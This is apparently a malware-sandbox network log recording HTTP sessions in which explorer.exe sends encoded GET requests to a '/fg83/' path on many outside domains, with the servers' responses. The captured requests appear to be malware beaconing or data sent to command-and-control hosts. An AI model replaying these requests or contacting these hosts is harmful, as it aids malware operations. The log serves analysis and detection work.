                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 74 75 61 6b 6c 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.rtuakl.xyz Port 80</address></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                14192.168.11.204994618.225.33.21080C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Aug 23, 2023 09:36:12.408483982 CEST542OUTGET /fg83/?IpZXsVy=Mrfpj9Lscj+lGsorq1+NGtecW7+GotfegZgYdt6juanfgo0fmIEP17Z154I/86DF7ZrT&1b_Pr=C88x5r HTTP/1.1
                                                                                                                                                                                Host: www.r5fesgy.com
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Aug 23, 2023 09:36:12.566406965 CEST543INHTTP/1.1 403 Forbidden
                                                                                                                                                                                Date: Wed, 23 Aug 2023 07:36:12 GMT
                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                                                                                                                                                Content-Length: 207
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 66 67 38 33 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /fg83/on this server.</p></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                15192.168.11.204994792.205.50.7380C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Aug 23, 2023 09:36:32.743917942 CEST543OUTGET /fg83/?1b_Pr=C88x5r&IpZXsVy=o9iJiepY7tbZK5GL3oPLoe4ACswWoGUScwmdQvzUuUD/DHdXMl0ph81Qbo3YWeK2S1M+ HTTP/1.1
                                                                                                                                                                                Host: www.lido.systems
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Aug 23, 2023 09:36:32.761950970 CEST544INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Wed, 23 Aug 2023 07:36:32 GMT
                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                16192.168.11.204994891.195.240.12380C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Aug 23, 2023 09:36:52.935537100 CEST545OUTGET /fg83/?IpZXsVy=AfWx5BM5NEDLLjiDiXzoNqwgCc8LDH2xQfiELIIrQmIg7de8Ug2fD1PTSOtTZsGWy/y0&1b_Pr=C88x5r HTTP/1.1
                                                                                                                                                                                Host: www.ngbjf.cyou
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Aug 23, 2023 09:36:52.977883101 CEST546INHTTP/1.1 200 OK
                                                                                                                                                                                date: Wed, 23 Aug 2023 07:36:52 GMT
                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                x-powered-by: PHP/8.1.17
                                                                                                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EaSm8olp97qAIjhNUVhDYkqG+JMrB7XfeppB1yS1/YfjlFSr4csc5npdMaE35vWN1AxLyxG31z3QeeY71/HgtA==
                                                                                                                                                                                last-modified: Wed, 23 Aug 2023 07:36:52 GMT
                                                                                                                                                                                x-cache-miss-from: parking-76fb44b76-mdsfb
                                                                                                                                                                                server: NginX
                                                                                                                                                                                connection: close
                                                                                                                                                                                Data Raw: 32 44 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 45 61 53 6d 38 6f 6c 70 39 37 71 41 49 6a 68 4e 55 56 68 44 59 6b 71 47 2b 4a 4d 72 42 37 58 66 65 70 70 42 31 79 53 31 2f 59 66 6a 6c 46 53 72 34 63 73 63 35 6e 70 64 4d 61 45 33 35 76 57 4e 31 41 78 4c 79 78 47 33 31 7a 33 51 65 65 59 37 31 2f 48 67 74 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6e 67 62 6a 66 2e 63 79 6f 75 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 7a 75 6d 20 54 68 65 6d 61 20 6e 67 62 6a 66 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 67 62 6a 66 2e 63 79 6f 75 20 69 73 74 20 64 69 65 20 62 65 73 74 65 20 51 75 65 6c 6c 65 20 66 c3 bc 72 20 61 6c 6c 65 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 64 69 65 20 53 69 65 20 73 75 63 68 65 6e 2e 20 56 6f 6e 20 61 6c 6c 67 65 6d 65 69 6e 65 6e 20 54 68 65 6d 65 6e 20 62 69 73 20 68 69 6e 20 7a 75 20 73 70 65 7a 69 65 6c 6c
                                                                                                                                                                                Data Ascii: 2D0<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EaSm8olp97qAIjhNUVhDYkqG+JMrB7XfeppB1yS1/YfjlFSr4csc5npdMaE35vWN1AxLyxG31z3QeeY71/HgtA==><head><meta charset="utf-8"><title>ngbjf.cyou&nbsp;-&nbsp;Informationen zum Thema ngbjf.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="ngbjf.cyou ist die beste Quelle fr alle Informationen die Sie suchen. Von allgemeinen Themen bis hin zu speziell
                                                                                                                                                                                Aug 23, 2023 09:36:52.977973938 CEST547INData Raw: 65 6e 20 53 61 63 68 76 65 72 68 61 6c 74 65 6e 2c 20 66 69 6e 64 65 6e 20 53 69 65 20 61 75 66 20 6e 67 62 6a 66 2e 63 79 6f 75 20 61 6c 6c 65 73 2e 20 57 69 72 20 68 6f 66 66 65 6e 2c 20 64 61 73 73 20 53 69 65 20 68 69 65 72 20 64 61 73 20 47
                                                                                                                                                                                Data Ascii: en Sachverhalten, finden Sie auf ngbjf.cyou alles. Wir hoffen, dass Sie hier das Gesuchte finden!"><link 58F rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> /*
                                                                                                                                                                                Aug 23, 2023 09:36:52.978049040 CEST548INData Raw: 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74
                                                                                                                                                                                Data Ascii: tarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-moz-focus-inner,[type
                                                                                                                                                                                Aug 23, 2023 09:36:52.978121042 CEST550INData Raw: 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 63 6f
                                                                                                                                                                                Data Ascii: nter;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__content-buy
                                                                                                                                                                                Aug 23, 2023 09:36:52.978177071 CEST550INData Raw: 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63
                                                                                                                                                                                Data Ascii: rint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#949494}.c
                                                                                                                                                                                Aug 23, 2023 09:36:52.978231907 CEST552INData Raw: 31 37 39 35 0d 0a 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 35 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f
                                                                                                                                                                                Data Ascii: 1795nt-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-interactive{text-align:left;
                                                                                                                                                                                Aug 23, 2023 09:36:52.978307009 CEST553INData Raw: 5f 5f 63 6f 6e 74 65 6e 74 2d 6e 65 63 65 73 73 61 72 79 2d 63 6f 6f 6b 69 65 73 2d 72 6f 77 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 65 65 31 65 33 7d 2e 64 69 73 61 62 6c 65 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7a 2d
                                                                                                                                                                                Data Ascii: __content-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;tran
                                                                                                                                                                                Aug 23, 2023 09:36:52.978369951 CEST554INData Raw: 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 68 65 69 67 68 74 3a 32 36 70 78 3b 77 69 64 74 68 3a 32 36 70 78 3b 6c 65 66 74 3a 34 70 78 3b 62 6f 74 74 6f 6d 3a 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63
                                                                                                                                                                                Data Ascii: sition:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__
                                                                                                                                                                                Aug 23, 2023 09:36:52.978439093 CEST556INData Raw: 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 74 6f 70 20 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69
                                                                                                                                                                                Data Ascii: sedoparking.com/templates/bg/arrows.png") #0e162e no-repeat top left;background-size:94% 640px;flex-grow:1;position:inherit;top:90px;overflow:hidden;z-index:-1}.container-content__right{background:url("//img.sedoparking.com/templates/bg/arrows
                                                                                                                                                                                Aug 23, 2023 09:36:52.978514910 CEST557INData Raw: 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 31 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b
                                                                                                                                                                                Data Ascii: text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active
                                                                                                                                                                                Aug 23, 2023 09:36:52.989586115 CEST558INData Raw: 61 6d 65 2d 73 69 6c 6f 2d 62 61 6e 6e 65 72 20 61 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 72 69 67 68 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 67 72 69 64 2d 61 72 65 61 3a 31 2f 32 2f 32 2f 36 7d 2e 6c 65 66 74 2d 63 6f 6e 74 61 69 6e 65 72
                                                                                                                                                                                Data Ascii: ame-silo-banner a{color:#949494}.right-container{grid-area:1/2/2/6}.left-container{background-image:url("https://img.sedoparking.com/templates/bg/NameSiloLogo.png");background-size:9vw;background-repeat:no-repeat;margin-right:10px;grid-area:1/


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                2192.168.11.2049928198.54.117.21280C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Aug 23, 2023 09:29:42.718305111 CEST322OUTGET /fg83/?kxopsN=MlyXbd0X&IpZXsVy=h0bAtoVykYa/rrFkLV94YI4T4if6JB47wwwQdxj8azu213gVVwhSCjjiLgU+HyCgJrmv HTTP/1.1
                                                                                                                                                                                Host: www.aitechscope.com
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                3192.168.11.2049931104.21.6.5780C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Aug 23, 2023 09:30:23.778245926 CEST332OUTGET /fg83/?kxopsN=MlyXbd0X&IpZXsVy=6qxxm/Myx8P+pgfcTInzw0qSPJTBsSTIKigtmaaw24rUvouFUh5mZ96ocSMrLiBbFzYo HTTP/1.1
                                                                                                                                                                                Host: www.telefonino.shop
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                4192.168.11.204993285.10.194.22880C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Aug 23, 2023 09:30:44.545161009 CEST333OUTGET /fg83/?IpZXsVy=02BfcyhJkHSWiCynkOFfJGJebC0YFa9k1Fy3MEzZL5gnqTIU5GtxmB+WNcUmplxHMKNA&kxopsN=MlyXbd0X HTTP/1.1
                                                                                                                                                                                Host: www.zentrimax.com
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Aug 23, 2023 09:30:44.673171997 CEST333INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                Connection: close
                                                                                                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                x-redirect-by: WordPress
                                                                                                                                                                                location: http://zentrimax.com/fg83/?IpZXsVy=02BfcyhJkHSWiCynkOFfJGJebC0YFa9k1Fy3MEzZL5gnqTIU5GtxmB+WNcUmplxHMKNA&kxopsN=MlyXbd0X
                                                                                                                                                                                content-length: 0
                                                                                                                                                                                date: Wed, 23 Aug 2023 07:30:44 GMT


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                5192.168.11.204993334.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Aug 23, 2023 09:31:04.844970942 CEST334OUTGET /fg83/?kxopsN=MlyXbd0X&IpZXsVy=T6ZJsGSn7Xix6KaCNKUP+2dHlKNLLzmiVy8An9M+L4qtZR+McsZCzJePNx5gVfUlgzDb HTTP/1.1
                                                                                                                                                                                Host: www.luckymotherclucker.com
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Aug 23, 2023 09:31:04.965764046 CEST335INHTTP/1.1 403 Forbidden
                                                                                                                                                                                Server: openresty
                                                                                                                                                                                Date: Wed, 23 Aug 2023 07:31:04 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 291
                                                                                                                                                                                ETag: "64e238d1-123"
                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                6192.168.11.204993643.154.67.17080C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Aug 23, 2023 09:31:25.801440954 CEST345OUTGET /fg83/?IpZXsVy=SC/iCgFLVXNGeXCdvfSQQa0Pnk4CAUJ5O5Rqv1EukQPQaC7CZmx4daunLr1tFIMbtKb4&kxopsN=MlyXbd0X HTTP/1.1
                                                                                                                                                                                Host: www.nrodwukb.click
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Aug 23, 2023 09:31:26.044272900 CEST345INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                Date: Wed, 23 Aug 2023 07:31:25 GMT
                                                                                                                                                                                Content-Length: 18
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                                                                                                                                                Data Ascii: 404 page not found


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                7192.168.11.2049937188.114.97.380C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Aug 23, 2023 09:32:26.954531908 CEST346OUTGET /fg83/?kxopsN=MlyXbd0X&IpZXsVy=7beFqJnGqWKAzf+YtrCM1R0h2XEeEfVRhbTn4ULJnEu/U/SD/89uYryM33AUZhPPBj1C HTTP/1.1
                                                                                                                                                                                Host: www.ballbucketssalesstore.com
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Aug 23, 2023 09:32:27.056411028 CEST347INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                Date: Wed, 23 Aug 2023 07:32:27 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Location: https://www.ballbucketssalesstore.com/fg83/?kxopsN=MlyXbd0X&IpZXsVy=7beFqJnGqWKAzf+YtrCM1R0h2XEeEfVRhbTn4ULJnEu/U/SD/89uYryM33AUZhPPBj1C
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mAF8FYZZhRh0d4bVhXpdGgi8lUAZuapPU6n6bnxR%2FZ8AJgD1DZvPsjgheKn0qeXLW6jbE3IHzRrhoqyvhhLKXR8kgxyzSzhw0gRAt11pkzruPk6EKba2Z0%2Bo08nyy8maA09vWXXlFkf4IG9NQNJdRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 7fb1a9647a5a9277-FRA
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                Aug 23, 2023 09:32:27.056480885 CEST347INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                8192.168.11.2049938185.53.179.9180C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Aug 23, 2023 09:32:47.291632891 CEST348OUTGET /fg83/?IpZXsVy=vgcZVq2vlo6tIZLwBMCb9IR7Fd0F2pwxk1GGseMFxnAAiVZXKfn9ZK8RnpW3pp9l3vJN&kxopsN=MlyXbd0X HTTP/1.1
                                                                                                                                                                                Host: www.pingpongtable-sg.bond
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Aug 23, 2023 09:32:47.310131073 CEST348INHTTP/1.1 403 Forbidden
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Wed, 23 Aug 2023 07:32:47 GMT
